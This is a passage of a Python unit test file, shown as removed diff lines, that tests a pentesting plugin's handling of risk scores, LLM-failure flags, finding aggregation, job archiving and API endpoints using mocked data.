- {"title": "Weak SSH key", "severity": "LOW", "cwe_id": "CWE-320", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 1) - self.assertEqual(findings[0]["protocol"], "unknown") - - def test_llm_success_no_llm_failed(self): - """LLM succeeds → llm_failed absent from serialized PassReport.""" - from extensions.business.cybersec.red_mesh.models import PassReport - - pr = PassReport( - pass_nr=1, date_started=1000.0, date_completed=1100.0, duration=100.0, - aggregated_report_cid="QmAgg", - worker_reports={}, - risk_score=50, - llm_analysis="# Analysis\nAll good.", - quick_summary="No critical issues found.", - 
llm_failed=None, # success - ) - d = pr.to_dict() - self.assertNotIn("llm_failed", d) - self.assertEqual(d["llm_analysis"], "# Analysis\nAll good.") - - def test_llm_failure_flag_and_timeline(self): - """LLM fails → llm_failed: True, timeline event added.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin(llm_enabled=True) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - # LLM returns None (failure) - plugin._run_aggregated_llm_analysis = MagicMock(return_value=None) - plugin._run_quick_summary_analysis = MagicMock(return_value=None) - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # Check PassReport has llm_failed=True - pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - self.assertTrue(pass_report_dict.get("llm_failed")) - - # Check timeline event was emitted for llm_failed - llm_failed_calls = [ - c for c in plugin._emit_timeline_event.call_args_list - if c[0][1] == "llm_failed" - ] - self.assertEqual(len(llm_failed_calls), 1) - # _emit_timeline_event(job_specs, "llm_failed", label, meta={"pass_nr": ...}) - call_kwargs = llm_failed_calls[0][1] # keyword args - meta = call_kwargs.get("meta", {}) - self.assertIn("pass_nr", meta) - - def 
test_aggregated_report_write_failure(self): - """R1FS fails for aggregated → pass finalization skipped, no partial state.""" - PentesterApi01Plugin = self._get_plugin_class() - # First R1FS write (aggregated) returns None = failure - plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: None, 2: "QmPassCID"}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore should NOT have pass_reports appended - self.assertEqual(len(job_specs["pass_reports"]), 0) - # CStore hset was called for intermediate status updates (COLLECTING, ANALYZING, FINALIZING) - # but NOT for finalization — verify job_status is NOT FINALIZED in the last write - for call_args in plugin.chainstore_hset.call_args_list: - value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None - if isinstance(value, dict): - self.assertNotEqual(value.get("job_status"), "FINALIZED") - - def test_pass_report_write_failure(self): - """R1FS fails for pass report → CStore pass_reports not appended.""" - PentesterApi01Plugin = self._get_plugin_class() - # First R1FS write (aggregated) succeeds, second (pass report) fails - plugin, job_specs = 
self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: None}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore should NOT have pass_reports appended - self.assertEqual(len(job_specs["pass_reports"]), 0) - # CStore hset was called for status updates but NOT for finalization - for call_args in plugin.chainstore_hset.call_args_list: - value = call_args.kwargs.get("value") or call_args[1].get("value") if len(call_args) > 1 else None - if isinstance(value, dict): - self.assertNotEqual(value.get("job_status"), "FINALIZED") - - def test_cstore_risk_score_updated(self): - """After pass, risk_score on CStore matches pass result.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - 
plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 42, "breakdown": {"findings_score": 30}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # CStore risk_score updated - self.assertEqual(job_specs["risk_score"], 42) - - # PassReportRef in pass_reports has same risk_score - self.assertEqual(len(job_specs["pass_reports"]), 1) - ref = job_specs["pass_reports"][0] - self.assertEqual(ref["risk_score"], 42) - self.assertIn("report_cid", ref) - self.assertEqual(ref["pass_nr"], 1) - - -class TestPhase4UiAggregate(unittest.TestCase): - """Phase 4: UI Aggregate Computation.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _make_plugin(self): - plugin = MagicMock() - Plugin = self._get_plugin_class() - plugin._count_services = lambda si: Plugin._count_services(plugin, si) - plugin._compute_ui_aggregate = lambda passes, agg: Plugin._compute_ui_aggregate(plugin, passes, agg) - plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER - plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER - return plugin, Plugin - - def _make_finding(self, severity="HIGH", confidence="firm", finding_id="abc123", title="Test"): - return {"finding_id": finding_id, "severity": severity, "confidence": confidence, "title": title} - - def _make_pass(self, pass_nr=1, findings=None, risk_score=0, worker_reports=None): - return { - "pass_nr": pass_nr, - "risk_score": risk_score, - "risk_breakdown": 
{"findings_score": 10}, - "quick_summary": "Summary text", - "findings": findings, - "worker_reports": worker_reports or { - "w1": {"start_port": 1, "end_port": 512, "open_ports": [80]}, - }, - } - - def _make_aggregated(self, open_ports=None, service_info=None): - return { - "open_ports": open_ports or [80, 443], - "service_info": service_info or { - "80": {"_service_info_http": {"findings": []}}, - "443": {"_service_info_https": {"findings": []}}, - }, - } - - def test_findings_count_uppercase_keys(self): - """findings_count keys are UPPERCASE.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="CRITICAL", finding_id="f1"), - self._make_finding(severity="HIGH", finding_id="f2"), - self._make_finding(severity="HIGH", finding_id="f3"), - self._make_finding(severity="MEDIUM", finding_id="f4"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - fc = result.to_dict()["findings_count"] - self.assertEqual(fc["CRITICAL"], 1) - self.assertEqual(fc["HIGH"], 2) - self.assertEqual(fc["MEDIUM"], 1) - for key in fc: - self.assertEqual(key, key.upper()) - - def test_top_findings_max_10(self): - """More than 10 CRITICAL+HIGH -> capped at 10.""" - plugin, _ = self._make_plugin() - findings = [self._make_finding(severity="CRITICAL", finding_id=f"f{i}") for i in range(15)] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - self.assertEqual(len(result.to_dict()["top_findings"]), 10) - - def test_top_findings_sorted(self): - """CRITICAL before HIGH, within same severity sorted by confidence.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="HIGH", confidence="certain", finding_id="f1", title="H-certain"), - self._make_finding(severity="CRITICAL", confidence="tentative", finding_id="f2", title="C-tentative"), - self._make_finding(severity="HIGH", confidence="tentative", 
finding_id="f3", title="H-tentative"), - self._make_finding(severity="CRITICAL", confidence="certain", finding_id="f4", title="C-certain"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - top = result.to_dict()["top_findings"] - self.assertEqual(top[0]["title"], "C-certain") - self.assertEqual(top[1]["title"], "C-tentative") - self.assertEqual(top[2]["title"], "H-certain") - self.assertEqual(top[3]["title"], "H-tentative") - - def test_top_findings_excludes_medium(self): - """MEDIUM/LOW/INFO findings never in top_findings.""" - plugin, _ = self._make_plugin() - findings = [ - self._make_finding(severity="MEDIUM", finding_id="f1"), - self._make_finding(severity="LOW", finding_id="f2"), - self._make_finding(severity="INFO", finding_id="f3"), - ] - p = self._make_pass(findings=findings) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertNotIn("top_findings", d) # stripped by _strip_none (None) - - def test_finding_timeline_single_pass(self): - """1 pass -> finding_timeline is None (stripped).""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertNotIn("finding_timeline", d) # None → stripped - - def test_finding_timeline_multi_pass(self): - """3 passes with overlapping findings -> correct first_seen, last_seen, pass_count.""" - plugin, _ = self._make_plugin() - f_persistent = self._make_finding(finding_id="persist1") - f_transient = self._make_finding(finding_id="transient1") - f_new = self._make_finding(finding_id="new1") - passes = [ - self._make_pass(pass_nr=1, findings=[f_persistent, f_transient]), - self._make_pass(pass_nr=2, findings=[f_persistent]), - self._make_pass(pass_nr=3, findings=[f_persistent, f_new]), - ] - agg = self._make_aggregated() - result = 
plugin._compute_ui_aggregate(passes, agg) - ft = result.to_dict()["finding_timeline"] - self.assertEqual(ft["persist1"]["first_seen"], 1) - self.assertEqual(ft["persist1"]["last_seen"], 3) - self.assertEqual(ft["persist1"]["pass_count"], 3) - self.assertEqual(ft["transient1"]["first_seen"], 1) - self.assertEqual(ft["transient1"]["last_seen"], 1) - self.assertEqual(ft["transient1"]["pass_count"], 1) - self.assertEqual(ft["new1"]["first_seen"], 3) - self.assertEqual(ft["new1"]["last_seen"], 3) - self.assertEqual(ft["new1"]["pass_count"], 1) - - def test_zero_findings(self): - """findings_count is {}, top_findings is [], total_findings is 0.""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated() - result = plugin._compute_ui_aggregate([p], agg) - d = result.to_dict() - self.assertEqual(d["total_findings"], 0) - # findings_count and top_findings are None (stripped) when empty - self.assertNotIn("findings_count", d) - self.assertNotIn("top_findings", d) - - def test_open_ports_sorted_unique(self): - """total_open_ports is deduped and sorted.""" - plugin, _ = self._make_plugin() - p = self._make_pass(findings=[]) - agg = self._make_aggregated(open_ports=[443, 80, 443, 22, 80]) - result = plugin._compute_ui_aggregate([p], agg) - self.assertEqual(result.to_dict()["total_open_ports"], [22, 80, 443]) - - def test_count_services(self): - """_count_services counts ports with at least one detected service.""" - plugin, _ = self._make_plugin() - service_info = { - "80": {"_service_info_http": {}, "_web_test_xss": {}}, - "443": {"_service_info_https": {}, "_service_info_http": {}}, - } - self.assertEqual(plugin._count_services(service_info), 2) - self.assertEqual(plugin._count_services({}), 0) - self.assertEqual(plugin._count_services(None), 0) - - -class TestPhase3Archive(unittest.TestCase): - """Phase 3: Job Close & Archive.""" - - @classmethod - def _mock_plugin_modules(cls): - if 
'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_archive_plugin(self, job_id="test-job", pass_count=1, run_mode="SINGLEPASS", - job_status="FINALIZED", r1fs_write_fail=False, r1fs_verify_fail=False): - """Build a mock plugin pre-configured for _build_job_archive testing.""" - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.time.return_value = 1000200.0 - plugin.json_dumps.return_value = "{}" - - # R1FS mock - plugin.r1fs = MagicMock() - - # Build pass report dicts and refs - pass_reports_data = [] - pass_report_refs = [] - for i in range(1, pass_count + 1): - pr = { - "pass_nr": i, - "date_started": 1000000.0 + (i - 1) * 100, - "date_completed": 1000000.0 + i * 100, - "duration": 100.0, - "aggregated_report_cid": f"QmAgg{i}", - "worker_reports": { - "worker-A": {"report_cid": f"QmWorker{i}A", "start_port": 1, "end_port": 512, "ports_scanned": 512, "open_ports": [80], "nr_findings": 2}, - }, - "risk_score": 25 + i, - "risk_breakdown": {"findings_score": 10}, - "findings": [ - {"finding_id": f"f{i}a", "severity": "HIGH", "confidence": "firm", "title": f"Finding {i}A"}, - {"finding_id": f"f{i}b", "severity": "MEDIUM", "confidence": "firm", "title": f"Finding {i}B"}, - ], - "quick_summary": f"Summary for pass {i}", - } - pass_reports_data.append(pr) - pass_report_refs.append({"pass_nr": i, "report_cid": f"QmPassReport{i}", "risk_score": 25 + i}) - - # Job config - job_config = { - "target": "example.com", "start_port": 1, "end_port": 1024, - "run_mode": run_mode, "enabled_features": [], - } - - # Latest aggregated data - latest_aggregated = { - "open_ports": [80, 443], "service_info": {"80": 
{"_service_info_http": {}}}, - "web_tests_info": {}, "completed_tests": ["port_scan"], "ports_scanned": 1024, - } - - # R1FS get_json: return the right data for each CID - cid_map = {"QmConfigCID": job_config} - for i, pr in enumerate(pass_reports_data): - cid_map[f"QmPassReport{i+1}"] = pr - cid_map[f"QmAgg{i+1}"] = latest_aggregated - - if r1fs_write_fail: - plugin.r1fs.add_json.return_value = None - else: - archive_cid = "QmArchiveCID" - plugin.r1fs.add_json.return_value = archive_cid - if r1fs_verify_fail: - # add_json succeeds but get_json for the archive CID returns None - orig_map = dict(cid_map) - def verify_fail_get(cid): - if cid == archive_cid: - return None - return orig_map.get(cid) - plugin.r1fs.get_json.side_effect = verify_fail_get - else: - # Verification succeeds — archive CID also returns data - cid_map[archive_cid] = {"job_id": job_id} # minimal archive for verification - plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) - - if not r1fs_write_fail and not r1fs_verify_fail: - plugin.r1fs.get_json.side_effect = lambda cid: cid_map.get(cid) - - # Job specs (running state) - job_specs = { - "job_id": job_id, - "job_status": job_status, - "job_pass": pass_count, - "run_mode": run_mode, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 25 + pass_count, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, - }, - "timeline": [ - {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}, - ], - "pass_reports": pass_report_refs, - } - - plugin.chainstore_hset = MagicMock() - - # Bind real methods for archive building - Plugin = self._get_plugin_class() - plugin._compute_ui_aggregate = lambda passes, agg: 
Plugin._compute_ui_aggregate(plugin, passes, agg) - plugin._count_services = lambda si: Plugin._count_services(plugin, si) - plugin.SEVERITY_ORDER = Plugin.SEVERITY_ORDER - plugin.CONFIDENCE_ORDER = Plugin.CONFIDENCE_ORDER - - return plugin, job_specs, pass_reports_data, job_config - - def test_archive_written_to_r1fs(self): - """Archive stored in R1FS with job_id, job_config, passes, ui_aggregate.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, job_config = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # r1fs.add_json called with archive dict - self.assertTrue(plugin.r1fs.add_json.called) - archive_dict = plugin.r1fs.add_json.call_args[0][0] - self.assertEqual(archive_dict["job_id"], "test-job") - self.assertEqual(archive_dict["job_config"]["target"], "example.com") - self.assertEqual(len(archive_dict["passes"]), 1) - self.assertIn("ui_aggregate", archive_dict) - self.assertIn("total_open_ports", archive_dict["ui_aggregate"]) - - def test_archive_duration_computed(self): - """duration == date_completed - date_created, not 0.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - archive_dict = plugin.r1fs.add_json.call_args[0][0] - # date_created=1000000, time()=1000200 → duration=200 - self.assertEqual(archive_dict["duration"], 200.0) - self.assertGreater(archive_dict["duration"], 0) - - def test_stub_has_job_cid_and_config_cid(self): - """After prune, CStore stub has job_cid and job_config_cid.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # Extract the stub written to CStore - hset_call = plugin.chainstore_hset.call_args - stub = hset_call[1]["value"] - self.assertEqual(stub["job_cid"], "QmArchiveCID") - self.assertEqual(stub["job_config_cid"], "QmConfigCID") - - def 
test_stub_fields_match_model(self): - """Stub has exactly CStoreJobFinalized fields.""" - from extensions.business.cybersec.red_mesh.models import CStoreJobFinalized - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - stub = plugin.chainstore_hset.call_args[1]["value"] - # Verify it can be loaded into CStoreJobFinalized - finalized = CStoreJobFinalized.from_dict(stub) - self.assertEqual(finalized.job_id, "test-job") - self.assertEqual(finalized.job_status, "FINALIZED") - self.assertEqual(finalized.target, "example.com") - self.assertEqual(finalized.pass_count, 1) - self.assertEqual(finalized.worker_count, 1) - self.assertEqual(finalized.start_port, 1) - self.assertEqual(finalized.end_port, 1024) - self.assertGreater(finalized.duration, 0) - - def test_pass_report_cids_cleaned_up(self): - """After archive, individual pass CIDs deleted from R1FS.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # Check delete_file was called for pass report CID - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - self.assertIn("QmPassReport1", delete_calls) - - def test_node_report_cids_preserved(self): - """Worker report CIDs NOT deleted.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - self.assertNotIn("QmWorker1A", delete_calls) - - def test_aggregated_report_cids_preserved(self): - """aggregated_report_cid per pass NOT deleted.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] - 
self.assertNotIn("QmAgg1", delete_calls) - - def test_archive_write_failure_no_prune(self): - """R1FS write fails -> CStore untouched, full running state retained.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_write_fail=True) - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - # CStore should NOT have been pruned - plugin.chainstore_hset.assert_not_called() - # pass_reports still present in job_specs - self.assertEqual(len(job_specs["pass_reports"]), 1) - - def test_archive_verify_failure_no_prune(self): - """CID not retrievable -> CStore untouched.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_verify_fail=True) - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - plugin.chainstore_hset.assert_not_called() - - def test_stuck_recovery(self): - """FINALIZED without job_cid -> _build_job_archive retried via _maybe_finalize_pass.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(job_status="FINALIZED") - # Simulate stuck state: FINALIZED but no job_cid - job_specs["job_status"] = "FINALIZED" - # No job_cid in specs - - plugin.chainstore_hgetall.return_value = {"test-job": job_specs} - plugin._normalize_job_record = MagicMock(return_value=("test-job", job_specs)) - plugin._build_job_archive = MagicMock() - - Plugin._maybe_finalize_pass(plugin) - - plugin._build_job_archive.assert_called_once_with("test-job", job_specs) - - def test_idempotent_rebuild(self): - """Calling _build_job_archive twice doesn't corrupt state.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin() - - Plugin._build_job_archive(plugin, "test-job", job_specs) - first_stub = plugin.chainstore_hset.call_args[1]["value"] - - # Reset and call again (simulating a retry where data is still available) - plugin.chainstore_hset.reset_mock() - plugin.r1fs.add_json.reset_mock() - new_archive_cid 
= "QmArchiveCID2" - plugin.r1fs.add_json.return_value = new_archive_cid - - # Update get_json to also return data for the new archive CID - orig_side_effect = plugin.r1fs.get_json.side_effect - def extended_get(cid): - if cid == new_archive_cid: - return {"job_id": "test-job"} - return orig_side_effect(cid) - plugin.r1fs.get_json.side_effect = extended_get - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - second_stub = plugin.chainstore_hset.call_args[1]["value"] - # Both produce valid stubs - self.assertEqual(first_stub["job_id"], second_stub["job_id"]) - self.assertEqual(first_stub["pass_count"], second_stub["pass_count"]) - - def test_multipass_archive(self): - """Archive with 3 passes contains all pass data.""" - Plugin = self._get_plugin_class() - plugin, job_specs, _, _ = self._build_archive_plugin(pass_count=3, run_mode="CONTINUOUS_MONITORING", job_status="STOPPED") - - Plugin._build_job_archive(plugin, "test-job", job_specs) - - archive_dict = plugin.r1fs.add_json.call_args[0][0] - self.assertEqual(len(archive_dict["passes"]), 3) - self.assertEqual(archive_dict["passes"][0]["pass_nr"], 1) - self.assertEqual(archive_dict["passes"][2]["pass_nr"], 3) - stub = plugin.chainstore_hset.call_args[1]["value"] - self.assertEqual(stub["pass_count"], 3) - self.assertEqual(stub["job_status"], "STOPPED") - - -class TestPhase5Endpoints(unittest.TestCase): - """Phase 5: API Endpoints.""" - - @classmethod - def _mock_plugin_modules(cls): - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_finalized_stub(self, job_id="test-job"): - """Build a CStoreJobFinalized-shaped dict.""" - return { - "job_id": job_id, - "job_status": "FINALIZED", - "target": "example.com", - "task_name": "Test", - 
"risk_score": 42, - "run_mode": "SINGLEPASS", - "duration": 200.0, - "pass_count": 1, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "worker_count": 2, - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "date_completed": 1000200.0, - "job_cid": "QmArchiveCID", - "job_config_cid": "QmConfigCID", - } - - def _build_running_job(self, job_id="run-job", pass_count=8): - """Build a running job dict with N pass_reports.""" - pass_reports = [ - {"pass_nr": i, "report_cid": f"QmPass{i}", "risk_score": 10 + i} - for i in range(1, pass_count + 1) - ] - return { - "job_id": job_id, - "job_status": "RUNNING", - "job_pass": pass_count, - "run_mode": "CONTINUOUS_MONITORING", - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Continuous Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 18, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": False}, - "worker-B": {"start_port": 513, "end_port": 1024, "finished": False}, - }, - "timeline": [ - {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher", "actor_type": "system", "meta": {}}, - {"type": "started", "label": "Started", "date": 1000001.0, "actor": "launcher", "actor_type": "system", "meta": {}}, - ], - "pass_reports": pass_reports, - } - - def _build_plugin(self, jobs_dict): - """Build a mock plugin with given jobs in CStore.""" - Plugin = self._get_plugin_class() - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.r1fs = MagicMock() - - plugin.chainstore_hgetall.return_value = dict(jobs_dict) - plugin.chainstore_hget.side_effect = lambda hkey, key: jobs_dict.get(key) - plugin._normalize_job_record = MagicMock( - side_effect=lambda k, v: (k, v) if isinstance(v, dict) and v.get("job_id") else (None, None) - ) - - 
# Bind real methods so endpoint logic executes properly - plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin) - plugin._get_job_from_cstore = lambda job_id: Plugin._get_job_from_cstore(plugin, job_id) - return plugin - - def test_get_job_archive_finalized(self): - """get_job_archive for finalized job returns archive with matching job_id.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - archive_data = {"job_id": "fin-job", "passes": [], "ui_aggregate": {}} - plugin.r1fs.get_json.return_value = archive_data - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["job_id"], "fin-job") - self.assertEqual(result["archive"]["job_id"], "fin-job") - - def test_get_job_archive_running(self): - """get_job_archive for running job returns not_available error.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=2) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.get_job_archive(plugin, job_id="run-job") - self.assertEqual(result["error"], "not_available") - - def test_get_job_archive_integrity_mismatch(self): - """Corrupted job_cid pointing to wrong archive is rejected.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - # Archive has a different job_id - plugin.r1fs.get_json.return_value = {"job_id": "other-job", "passes": []} - - result = Plugin.get_job_archive(plugin, job_id="fin-job") - self.assertEqual(result["error"], "integrity_mismatch") - - def test_get_job_data_running_last_5(self): - """Running job with 8 passes returns last 5 refs only.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=8) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.get_job_data(plugin, job_id="run-job") - 
self.assertTrue(result["found"]) - refs = result["job"]["pass_reports"] - self.assertEqual(len(refs), 5) - # Should be the last 5 (pass_nr 4-8) - self.assertEqual(refs[0]["pass_nr"], 4) - self.assertEqual(refs[-1]["pass_nr"], 8) - - def test_get_job_data_finalized_returns_stub(self): - """Finalized job returns stub as-is with job_cid.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - result = Plugin.get_job_data(plugin, job_id="fin-job") - self.assertTrue(result["found"]) - self.assertEqual(result["job"]["job_cid"], "QmArchiveCID") - self.assertEqual(result["job"]["pass_count"], 1) - - def test_list_jobs_finalized_as_is(self): - """Finalized stubs returned unmodified with all CStoreJobFinalized fields.""" - Plugin = self._get_plugin_class() - stub = self._build_finalized_stub("fin-job") - plugin = self._build_plugin({"fin-job": stub}) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("fin-job", result) - job = result["fin-job"] - self.assertEqual(job["job_cid"], "QmArchiveCID") - self.assertEqual(job["pass_count"], 1) - self.assertEqual(job["worker_count"], 2) - self.assertEqual(job["risk_score"], 42) - self.assertEqual(job["duration"], 200.0) - - def test_list_jobs_running_stripped(self): - """Running jobs have counts but no timeline, workers, or pass_reports.""" - Plugin = self._get_plugin_class() - running = self._build_running_job("run-job", pass_count=3) - plugin = self._build_plugin({"run-job": running}) - - result = Plugin.list_network_jobs(plugin) - self.assertIn("run-job", result) - job = result["run-job"] - # Should have counts - self.assertEqual(job["pass_count"], 3) - self.assertEqual(job["worker_count"], 2) - # Should NOT have heavy fields - self.assertNotIn("timeline", job) - self.assertNotIn("workers", job) - self.assertNotIn("pass_reports", job) - - def test_get_job_archive_not_found(self): - """get_job_archive for non-existent job returns 
